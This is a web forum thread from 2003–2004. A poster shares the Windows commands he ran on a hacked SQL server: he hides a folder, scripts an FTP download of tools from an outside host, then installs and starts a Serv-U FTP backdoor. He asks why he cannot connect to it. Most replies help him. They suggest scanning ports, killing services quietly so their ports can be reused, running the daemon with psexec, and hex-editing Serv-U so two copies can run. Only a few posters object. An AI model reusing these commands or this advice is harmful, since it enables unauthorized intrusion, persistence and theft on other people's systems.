Alex Trust
Aug 25 2003, 04:26 PM
oke here's my problem i can't get the ftp server online on a host i want 2 hack...
It's kinda really noobish 2 ask but well i'm despret I tried so many things and stillcan't get it
to work. So help would be apriciated if i'm correct there is nothing wrong with the commands i give.
the host I hacked is a SQL server:
commands I gave:
| CODE |
md \winnt\system32\drivers\disdd\.tmp\
attrib \winnt\system32\drivers\disdd\.tmp +h
echo open ftp.portland.co.uk 21 > C:\winnt\system32\drivers\disdd\.tmp\ftp.txt
echo "user" >> \winnt\system32\drivers\disdd\.tmp\ftp.txt
echo "pas" >> \winnt\system32\drivers\disdd\.tmp\ftp.txt
echo lcd C:\winnt\system32\drivers\disdd\.tmp >> C:\winnt\system32\drivers\disdd\.tmp\ftp.txt
echo cd cqi >> \winnt\system32\drivers\disdd\.tmp\ftp.txt
echo type binary >> \winnt\system32\drivers\disdd\.tmp\ftp.txt
echo mget *.* >> \winnt\system32\drivers\disdd\.tmp\ftp.txt
echo bye >> \winnt\system32\drivers\disdd\.tmp\ftp.txt
ftp.exe -i -s:\winnt\system32\drivers\disdd\.tmp\ftp.txt
C:\winnt\system32\drivers\disdd\.tmp\ServUDaemon.exe -install
net start Serv-U |
oke after this I entered the IP in my ftp browser with port and teh rest of the info and connected to the IP. I got connection timed out.
So I went looking and checked some things.
is the server running?
net start:
| CODE |
netstart:
Administrador de conexión de acceso remoto
Administrador de cuentas de seguridad
Administrador de discos lógicos
Agente de directivas IPSEC
Almacenamiento protegido
Cliente de seguimiento de vinculos distribuidos
Cliente DHCP
Cliente DNS
Cola de impresión
Conexiones de red
Estación de trabajo
Examinador de equipos
Exten. controlador Instrumental de admon. de Windows
Instrumental de administración de Windows
Llamada a procedimiento remoto(RPC)
Machine Debug Manager
Medios de almacenamiento extraíbles
Mensajero
MSSQLSERVER
Norton AntiVirus Auto Protect Service
Norton Unerase Protection
Notificación de sucesos del sistema
Plug and Play
Programador de tareas
Registro de sucesos
Remote Administrator Service
Serv-U FTP Server
Servicio de ayuda TCP/IP NetBIOS
Servicio de Registro remoto
Servicio RunAs
Servidor
Sistema de sucesos de COM+
SoundMAX Agent Service
Symantec Event Manager
Telefonía
Telefonía
|
Also checked the server with a install log:
install log:
| CODE |
SQL>Command: xp_cmdshell "type \winnt\system32\drivers\disdd\.tmp\ServUstartuplog.txt"
Mon 25Aug03 18:10:25 - Serv-U FTP Server v4.1 (4.1.0.3) - Copyright (c) 1995-2003 Cat Soft, All Rights Reserved - by Rob Beckers
Mon 25Aug03 18:10:25 - Cat Soft is an affiliate of Rhino Software, Inc.
Mon 25Aug03 18:10:25 - Using WinSock 2.0 - max. 32767 sockets
Mon 25Aug03 18:10:26 - PROBLEM: Unable to load the SSL/TLS libraries (SSLEAY32.DLL and LIBEAY32.DLL) - No SSL support
Mon 25Aug03 18:10:26 - FTP Server listening on port number 39999, IP 192.168.0.2, 127.0.0.1
Mon 25Aug03 18:10:26 - FTP Server listening on port number 12896, IP 127.0.0.1
Mon 25Aug03 18:10:26 - Valid registration key found
|
here's a overview of ipconfig maybe it helps:
ipconfig:
| CODE |
Configuración IP de Windows 2000
Ethernet adaptador Conexión de área local:
Sufijo DNS específico de la conexión. :
Dirección IP. . . . . . . . . . . . . : 192.168.0.2
Máscara de subred . . . . . . . . . . : 255.255.255.0
Puerta de enlace predeterminada . . . : 192.168.0.10
Puerta de enlace predeterminada . . . : 192.168.0.10
Puerta de enlace predeterminada . . . : 192.168.0.10
|
then I noticed that 192.168.0.2, 127.0.0.1 wasn't the ip i connected 2 on the SQL host. I tried to connect to 192.168.0.2 but i think it's
a network ip. So well i think this is where my error is The ftp doesn't list of the ip I connected to.
If everything i did was correct I'm affraid that there might be something wrong with my deamon file is there anywhere a article about how to configure it probably.
I have setted up lot's of ftp's with serv-u so I think it's gud this way. Also I have tested the deamon files on my local computer with a dos prompt and worked fine.
Hope you guys can help me
greetz Alex Trust
crackie
Aug 25 2003, 04:38 PM
try to do net start serv-u and serv-u /i more ! sometimes it dont work and u have to redo the cmd ! normally i dont help ppl wanna hack sb else cause this is security forum and not a hacking portal ! but if got the same prob a year ago so i replyt !
mfg crackie :/
Alex Trust
Aug 25 2003, 06:04 PM
crackie,
I apoligize for my post and i thaknk your for my help. But this leaves me with one more question. The Ip i'm hacking doesn't show up in the startuplog. How is that possible and is it right? I mean I don't think ic an connect to the ftp if it sn't hosted on the target ip number
greetz Alex Trust
DJohn84
Aug 25 2003, 08:13 PM
if the FTP server is started on your victim/target machine, then it appears that it is on a network using NAT.
So in your connection program, ther should be some option to connect to an IP behind a router/NAT. enable that option and try to connect.
dR4g0N
Aug 25 2003, 10:48 PM
| QUOTE |
| try to do net start serv-u and serv-u /i more ! |
i have sometimes some probs on wms, i cant start servu - usually i use servu 4 but i tried it with 2.5 too.
i try all to start it
servudaemon.exe
start servudaemon.exe
net start servudaemon <- invalid service name
anyone knows the real service name?
MxMx
Aug 25 2003, 11:04 PM
dragon .. the real service name is : Serv-U
hope it works now .. cya
dR4g0N
Aug 25 2003, 11:08 PM
nope sry,
| QUOTE |
the service name is invalid.
more help is available by typing NET HELPMSG 2815 |
;<
krackatoa
Aug 25 2003, 11:58 PM
If nat is in use and it obviously is then the ports you are choosing to open ftp on is probably being blocked. Scan your target's IP for all 65535 ports to see what is being allowed. You'll have to choose something open. Since SQL is in use, there's a good chance that the IP is firewalled. Run nmap to help verify it. Also run netstat -an on the target to see what is connecting to it, perhaps there is another server out there with more ports allowed.
If you find an open service, determine what is running and if killing it will raise the alarm. Kill the service and run your ftp on that port.
Alex Trust
Aug 26 2003, 06:42 AM
oke that last peice of advize is very usefull. Thnx for all the help guys I will try these things
tracerx
Aug 26 2003, 09:56 PM
its pulling the wrong ip for connection. in ur .ini file set it to the ip that ur sql is running on and restart the Serv-U Deamon. should work . 2. if firewall is stoping it. try a netstat -an. for listening ports. open, and try those. 3. if these two havent worked. try and see if this sql server hasnt already been hacked and running a version of serv-u when u start servu and u get no errors then you should be good. while u do a netstat -an look for ur port u set in the ini file to connect to. if u see the internal ip and port in listening mode should be good to connect. if u dont see ur port then its not running right and need to check into it more. hope this gets u in the right path just some steps ive done on servers with the same issues.
dozolax
Dec 20 2003, 03:25 AM
good post
agamemnon
Dec 20 2003, 11:54 PM
this is the sort of stuff that's going to get us closed down.
although what you post is interesting, you can't just ask for help in directly breaking the law - you just can't!
-ed.
northernsky
Dec 28 2003, 01:23 AM
Here are your potential problems:
A: Just because servu is started, doesn't mean it's yours, it could be somebody else's
B: If it's firewalled to allow port 1433, but not any others, you can't get it anyway
C: 192.168.* are non routable ip's, and if things aren't being port forwarded, then you're screwed.
FakoLy
Dec 28 2003, 02:04 PM
maybe port 1433 is filtered, or maybe this server has already been hacked and the servu process is already running... you can't run 2 times the same process..
check the running processes on the machine, even the Servu proces that could be renamed and kill it... then runn it again..
you can also use psexec instead of netstart..
| QUOTE |
psexec \\IP -d -s C:\winnt\system32\drivers\disdd\.tmp\ServUDaemon.exe
|
Feanor
Dec 28 2003, 03:27 PM
try uploading tlist, and check if your servu is running, or some other servu is running(to make sure it's your you can try renaming it), and if your is running, then something strange occured, if not, and no other servu is running, it's propably some kind of firewall, or AV, so just get to the next scan, you can do nothing with this one.
Cow|
Jan 2 2004, 09:01 PM
You can also see for the services that are running and kill 1 for example sql ( admin will notice probally or a more uncommon service ) and use the port then when it is open ( will be 1433 then for SQl ) when it has a firewall/router you dont have the problem then anymore
WaZa
Jan 2 2004, 11:12 PM
if u hex edit ur serv-u and change the mutex name, u can run 2 at the same time
if u want i can post a tut that shows how
predx
Jan 3 2004, 02:02 PM
it looks routed/nat too me if anything see if you can look at the gatewat maybe can shead a little more light on the routing situation..
no_stress
Jan 29 2004, 11:39 PM
| QUOTE (WaZa @ Jan 2 2004, 11:12 PM) |
| if u hex edit ur serv-u and change the mutex name, u can run 2 at the same time if u want i can post a tut that shows how |
man that was great!!! please include how to change servu service name, .ini file name, startuplog file name, and everything that has serv-u in it
... try to do those but always unsuccesseful...
thx a lot in advance!!
droppunx
Apr 16 2004, 06:51 PM
| QUOTE (tracerx @ Aug 26 2003, 09:56 PM) |
its pulling the wrong ip for connection. in ur .ini file set it to the ip that ur sql is running on and restart the Serv-U Deamon. should work . 2. if firewall is stoping it. try a netstat -an. for listening ports. open, and try those. 3. if these two havent worked. try and see if this sql server hasnt already been hacked and running a version of serv-u when u start servu and u get no errors then you should be good. while u do a netstat -an look for ur port u set in the ini file to connect to. if u see the internal ip and port in listening mode should be good to connect. if u dont see ur port then its not running right and need to check into it more. hope this gets u in the right path just some steps ive done on servers with the same issues.  |
EXCELLENT advice, I do this many times when I'm r00ting a server behind a hardware firewall (router), HOWEVER, 50% of the time it won't work, simply because routed computer will only have a few listening ports, and there are services running on them that, if stopped, will alert the admin. What would be the best would be to find some way to open a port from the command line. Is there any chance a command line utility has been developed to open ports? I honestly doubt it, but it would be wonderful, just thought I'd ask...
My last question is if you find that say port 25 is open and already running an FTP server, could you set your new FTP server to run on port 25 and would it work? Or will only 1 FTP server run from 1 open port?
The Doom Master
Apr 16 2004, 07:55 PM
mate it happent to my a lot of times when something like that usual happens i think u need to wait for the Server to restart so it will load b4 the Firewall loads up...
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.
